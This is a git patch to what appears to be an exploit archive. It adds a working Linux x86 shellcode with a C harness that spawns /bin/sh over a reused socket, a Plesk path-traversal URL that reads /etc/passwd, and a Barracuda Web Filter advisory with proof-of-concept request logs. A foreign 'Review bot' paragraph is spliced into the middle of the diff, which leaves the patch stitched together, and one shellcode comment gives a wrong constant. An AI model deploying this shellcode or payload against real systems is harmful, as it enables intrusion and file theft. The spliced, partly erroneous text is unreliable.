From 857d210af18bfc912ef3e35b532434d53614cc55 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 24 Jul 2014 04:40:20 +0000
Subject: [PATCH] Updated 07_24_2014
---
 files.csv | 17 +
 platforms/lin_x86/shellcode/34060.c | 66 ++++
 platforms/multiple/remote/34136.txt | 7 +
 platforms/multiple/webapps/34148.TXT | 444 +++++++++++++++++++++++++++
 platforms/php/webapps/34038.txt | 53 ++++
 platforms/php/webapps/34137.txt | 7 +
 platforms/php/webapps/34138.txt | 7 +
 platforms/php/webapps/34139.txt | 9 +
 platforms/php/webapps/34140.txt | 10 +
 platforms/php/webapps/34141.txt | 9 +
 platforms/php/webapps/34142.txt | 10 +
 platforms/php/webapps/34144.txt | 9 +
 platforms/php/webapps/34146.txt | 11 +
 platforms/php/webapps/34147.txt | 9 +
 platforms/unix/dos/34145.txt | 7 +
 platforms/windows/local/34131.py | 226 ++++++++++++++
 platforms/windows/remote/34059.py | 118 +++++++
 platforms/windows/remote/34143.txt | 9 +
 18 files changed, 1028 insertions(+)
 create mode 100755 platforms/lin_x86/shellcode/34060.c
 create mode 100755 platforms/multiple/remote/34136.txt
 create mode 100755 platforms/multiple/webapps/34148.TXT
 create mode 100755 platforms/php/webapps/34038.txt
 create mode 100755 platforms/php/webapps/34137.txt
 create mode 100755 platforms/php/webapps/34138.txt
 create mode 100755 platforms/php/webapps/34139.txt
 create mode 100755 platforms/php/webapps/34140.txt
 create mode 100755 platforms/php/webapps/34141.txt
 create mode 100755 platforms/php/webapps/34142.txt
 create mode 100755 platforms/php/webapps/34144.txt
 create mode 100755 platforms/php/webapps/34146.txt
 create mode 100755 platforms/php/webapps/34147.txt
 create mode 100755 platforms/unix/dos/34145.txt
 create mode 100755 platforms/windows/local/34131.py
 create mode 100755 platforms/windows/remote/34059.py
 create mode 100755 platforms/windows/remote/34143.txt
diff --git a/files.csv b/files.csv
index c3df5efb0..cae38e15a 100755
--- a/files.csv
+++ b/files.csv
@@ -30657,6 +30657,7 @@ id,file,description,date,author,platform,type,port
 34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
 34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
 34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0
+34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0
 34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
 34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
 34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
@@ -30676,6 +30677,8 @@ id,file,description,date,author,platform,type,port
 34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
 34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
 34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
+34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
+34060,platforms/lin_x86/shellcode/34060.c,"Socket Re-use Shellcode for Linux x86 (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
 34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80
 34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
@@ -30735,7 +30738,21 @@ id,file,description,date,author,platform,type,port
 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
+34131,platforms/windows/local/34131.py,"Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
 34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
 34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
+34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability",2010-06-21,"Pouya Daneshmand",multiple,remote,0
+34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0
+34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0
+34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0
+34140,platforms/php/webapps/34140.txt,"AneCMS 1.x 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
+34141,platforms/php/webapps/34141.txt,"AneCMS 1.x 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
+34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0
+34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0
+34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component 'Itemid' Parameter Cross Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0
+34145,platforms/unix/dos/34145.txt,"Python <= 3.2 'audioop' Module Memory Corruption Vulnerability",2010-06-14,haypo,unix,dos,0
+34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
+34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
+34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0
diff --git a/platforms/lin_x86/shellcode/34060.c b/platforms/lin_x86/shellcode/34060.c
new file mode 100755
index 000000000..c2a657313
--- /dev/null
+++ b/platforms/lin_x86/shellcode/34060.c
@@ -0,0 +1,66 @@
+/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
+ *
+ *
+ * Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
+ * execve /bin/sh
+ *
+ * Thanks: Charles Stevenson, ipv, 3LRVS research team
+ *
+ * gcc -o socket_reuse socket_reuse.c -z execstack
+ */
+
+char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
+"\x6a\x02" // push 0x2
+"\x5b" // pop ebx
+"\x6a\x29" // push 0x29
+"\x58" // pop eax
+"\xcd\x80" // int 0x80 -> call dup(2)
+"\x48" // dec eax
+/* Now EAX = our Socket File Descriptor */
+
+"\x89\xc6" // mov esi, eax
+
+/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
+"\x31\xc9" // xor %ecx,%ecx
+"\x56" // push %esi
+"\x5b" // pop %ebx
+// loop:
+"\x6a\x3f" // push $0x3f
+"\x58" // pop %eax
+"\xcd\x80" // int $0x80
+"\x41" // inc %ecx
+"\x80\xf9\x03" // cmp $0x3,%cl
+"\x75\xf5" // jne 80483e8
+
+/* execve /bin/sh by ipv */
+"\x6a\x0b" // push byte 0xb
+"\x58" // pop eax
+"\x99" // cdq
+"\x52" // push edx
+"\x31\xf6" // xor esi, esi - We add those instructions
+"\x56" // push esi - to clean up the arg stack
+"\x68\x2f\x2f\x73\x68" // push dword 0x68732f2f
+"\x68\x2f\x62\x69\x6e" // push dword 0x6e69922f
+"\x89\xe3" // mov ebx, esp
+"\x31\xc9" // xor ecx, ecx
+"\xcd\x80"; // int 0x80
+;
+
+/*
+
+shellcode[]=
+"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
+"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
+"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
+"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
+"\x89\xe3\x31\xc9\xcd\x80";
+
+*/
+
+
+int main(void)
+{
+ printf("Shellcode length: %d\n", strlen(shellcode));
+ (*(void(*)()) shellcode)();
+ return 0;
+}
diff --git a/platforms/multiple/remote/34136.txt b/platforms/multiple/remote/34136.txt
new file mode 100755
index 000000000..fa897cb06
--- /dev/null
+++ b/platforms/multiple/remote/34136.txt
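Review bot: `main` in 34060.c calls `printf` and `strlen` with no `#include <stdio.h>` / `#include <string.h>`, so the harness compiles only through implicit declarations, which C99-mode and current GCC/Clang defaults reject; add the two includes and, since `strlen` returns `size_t`, print with `printf("Shellcode length: %zu\n", strlen(shellcode));`. The lone `;` on the line after `"\xcd\x80"; // int 0x80` is an empty file-scope declaration that strict ISO C warns about and should be removed. Two comments are inaccurate: `"\x68\x2f\x62\x69\x6e"` pushes `0x6e69622f` ("/bin" little-endian), not `0x6e69922f`, and `// jne 80483e8` is an absolute address copied from a disassembly of the author's binary — `\x75\xf5` is a rel8 jump of -11 back to the `push $0x3f` under `// loop:`, so `// jne loop` is the comment that stays correct when the bytes are relocated. The header comment's `dup2(0,0), dup2(0,1), dup2(0,2)` also does not match the loop below, which calls dup2 with ebx set from the recovered socket descriptor (`push %esi` / `pop %ebx`), i.e. `dup2(fd,0..2)` as the later block comment says.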
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/40813/info
+
+Plesk Server Administrator (PSA) is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/multiple/webapps/34148.TXT b/platforms/multiple/webapps/34148.TXT
new file mode 100755
index 000000000..b5153d4ea
--- /dev/null
+++ b/platforms/multiple/webapps/34148.TXT
@@ -0,0 +1,444 @@ +Document Title: +=============== +Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass & Persistent Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1101 + + +Barracuda Networks Security ID (BNSEC): BNSEC-2361 +http://www.barracuda.com/kb?id=501600000013m4O + +Solution #00006619 +BNSEC-02361: Authenticated persistent IVE in Barracuda Web Filter v6.0.1 + + +Release Date: +============= +2014-07-22 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1101 + + +Common Vulnerability Scoring System: +==================================== +3.7 + + +Product & Service Introduction: +=============================== +The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, +easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and +Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware +from your organization. No more costly staff time lost repairing infected computers. + +( Copy of the Vendor Homepage: https://www.barracuda.com/products/webfilter ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities and a filter bypass issue in +the Barracuda Networks WebFilter 610-Vx appliance web-application. 
+ + +Vulnerability Disclosure Timeline: +================================== +2013-12-27: Researcher Notification & Coordination (Benjamin Kunz Mejri) +2013-12-28: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) +2014-01-19: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) +2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow] +2014-07-22: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Barracuda Networks +Product: WebFilter Appliance Web-Application 6.0.1.009 - X210 X310 X410 X510 X610 X710 X810 X910 X1010 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities and a filter bypass has been discovered in the Barracuda Networks WebFilter Model 610Vx appliance web-application. +The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected service, module or function. + +The vulnerability are located in the `domain names`, `grid__data in grid_columns` and `x-grid3-cell-inner x-grid3-col-name` +values of the `Basic > Reports` module. Remote attackers are able to inject own script code as domain name to execute the +context in the show advanced options menu listing (+plus). The attack vector is persistent located on the application-side +and the request method to inject is POST. + +To bypass the invalid domain exception the attacker first need to include a valid domain, in the second step he change the domain name value by a +session tamper. Reason behind the technique is that the input field validation is separatly done to the request method validation. 
The restriction +of the invalid input field check can be bypassed by usage of a session tamper to change the input field context live after the first direct input +encode of the web filter application. Another problem is located in the same module which affects the buttom name item listing. + +The security risk of the persistent input validation web vulnerability and fitler bypass is estimated as medium with a cvss (common vulnerability scoring +system) count of 3.7. Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged web-application account. +Successful exploitation of the vulnerability results in session hijacking (customers), persistent phishing, persistent external redirects or persistent +manipulation of connected or affected module context. + + +Request Method(s): + [+] GET + [+] POST + +Vulnerable Module(s): + [+] Basic > Reports > Advanced Options > Show Advanced Options + +Vulnerable Input Field(s): + [+] Add Domain + +Vulnerable Parameter(s): + [+] domain name + [+] grid__data in grid_columns + [+] x-grid3-cell-inner x-grid3-col-name + +Affected Module(s): + [+] Reports Module Index + [+] Reports Module Advanced Options List + [+] Buttom Name Item List + +Affected Version(s): + [+] All versions > Web-Filter applicance web-application + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low or medium +user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 
+ + +--- PoC Session Logs Request/Response Input Execution --- + +Status: 200[OK] +GET https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest +Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[160284] Mime Type[text/html] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Connection[keep-alive] + Cache-Control[max-age=0] + Response Headers: + Server[nginx/1.0.14] + Content-Type[text/html; charset=utf-8] + Connection[keep-alive] + Expires[Fri, 28 Sep 2012 13:22:20 GMT] + Date[Sat, 28 Sep 2013 13:22:20 GMT] + Content-Length[160284] + + +15:22:11.590[793ms][total 793ms] Status: 304[Not Modified] +GET https://webfilter.ptest.localhost:6317/css/calendar/calendar-win2k-cold-1.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[text/css,*/*;q=0.1] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest] + Connection[keep-alive] + If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT] + Cache-Control[max-age=0] + Response Headers: + Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:22:21 GMT] + Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT] + Connection[keep-alive] + Expires[Thu, 31 Dec 2037 23:55:55 GMT] + 
Cache-Control[max-age=315360000, public] + + +15:22:11.590[794ms][total 794ms] Status: 304[Not Modified] +GET https://webfilter.ptest.localhost:6317/css/autosuggest.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[text/css,*/*;q=0.1] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest] + Connection[keep-alive] + If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT] + Cache-Control[max-age=0] + Response Headers: + Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:22:21 GMT] + Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT] + Connection[keep-alive] + Expires[Thu, 31 Dec 2037 23:55:55 GMT] + Cache-Control[max-age=315360000, public] + + +15:22:11.591[813ms][total 813ms] Status: 304[Not Modified] +GET https://webfilter.ptest.localhost:6317/barracuda.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[text/css,*/*;q=0.1] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest] + Connection[keep-alive] + If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT] + Cache-Control[max-age=0] + Response Headers: + Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:22:21 GMT] + Last-Modified[Tue, 23 Jul 2013 02:54:15 
GMT] + Connection[keep-alive] + Expires[Thu, 31 Dec 2037 23:55:55 GMT] + Cache-Control[max-age=315360000, public] + + +15:22:11.594[987ms][total 987ms] Status: 304[Not Modified] +GET https://webfilter.ptest.localhost:6317/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[*/*] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest] + Connection[keep-alive] + If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT] + Cache-Control[max-age=0] + Response Headers: + Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:22:22 GMT] + Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT] + Connection[keep-alive] + Expires[Thu, 31 Dec 2037 23:55:55 GMT] + Cache-Control[max-age=315360000, public] + + +15:22:11.594[987ms][total 987ms] Status: 304[Not Modified] +GET https://webfilter.ptest.localhost:6317/js/ext-prototype-adapter.js?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[*/*] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest] + Connection[keep-alive] + If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT] + Cache-Control[max-age=0] + Response Headers: + 
Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:22:22 GMT] + Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT] + Connection[keep-alive] + Expires[Thu, 31 Dec 2037 23:55:55 GMT] + Cache-Control[max-age=315360000, public] + + +15:22:13.629[260ms][total 260ms] Status: 502[Bad Gateway] +GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[VALIDATE_ALWAYS ] Content Size[1789] Mime Type[text/html] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest] + Connection[keep-alive] + Response Headers: + Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:22:23 GMT] + Content-Type[text/html] + Content-Length[1789] + Connection[keep-alive] + + + + +--- PoC Session Logs Request/Response Delete Element Item Execution --- + +15:26:04.436[0ms][total 0ms] Status: pending[] +GET https://webfilter.ptest.localhost:6317/js/adapters/prototype-adapter.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[*/*] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi] + + +15:26:04.436[0ms][total 0ms] Status: pending[] +GET https://webfilter.ptest.localhost:6317/js/highcharts.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[*/*] 
+ Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi] + + +15:26:04.461[0ms][total 0ms] Status: pending[] +GET https://webfilter.ptest.localhost:6317/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + + +15:26:04.542[0ms][total 0ms] Status: pending[] +GET https://webfilter.ptest.localhost:6317/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[*/*] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi] + + +15:26:04.542[0ms][total 0ms] Status: pending[] +GET https://webfilter.ptest.localhost:6317/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[*/*] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi] + + +15:26:04.964[454ms][total 454ms] Status: 200[OK] +GET https://webfilter.ptest.localhost:6317/cgi-mod/header_logo.cgi?6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/gif] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + 
Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi] + Connection[keep-alive] + Response Headers: + Server[nginx/1.0.14] + Content-Type[image/gif] + Transfer-Encoding[chunked] + Connection[keep-alive] + Expires[Sat, 28 Sep 2013 13:26:14 GMT] + Date[Sat, 28 Sep 2013 13:26:14 GMT] + Cache-Control[no-cache, no-store] + + +15:26:05.740[213ms][total 213ms] Status: 502[Bad Gateway] +GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[LOAD_NORMAL] Content Size[1789] Mime Type[text/html] + Request Headers: + Host[webfilter.ptest.localhost:6317] + User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[en-US,en;q=0.5] + Accept-Encoding[gzip, deflate] + DNT[1] + Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi] + Connection[keep-alive] + Response Headers: + Server[nginx/1.0.14] + Date[Sat, 28 Sep 2013 13:26:15 GMT] + Content-Type[text/html] + Content-Length[1789] + Connection[keep-alive] + + + +Reference(s): +https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the input to add domains. Ensure that the application GET to POST requests are restricted and filtered +to prevent further attacks in the vulnerable add domains module section. + + +Barracuda Networks Appliance: Advanced >Firmware Updates Page +http://www.barracuda.com/kb?id=501600000013m4O + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerabilities and estimated as medium(+). 
+ + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - 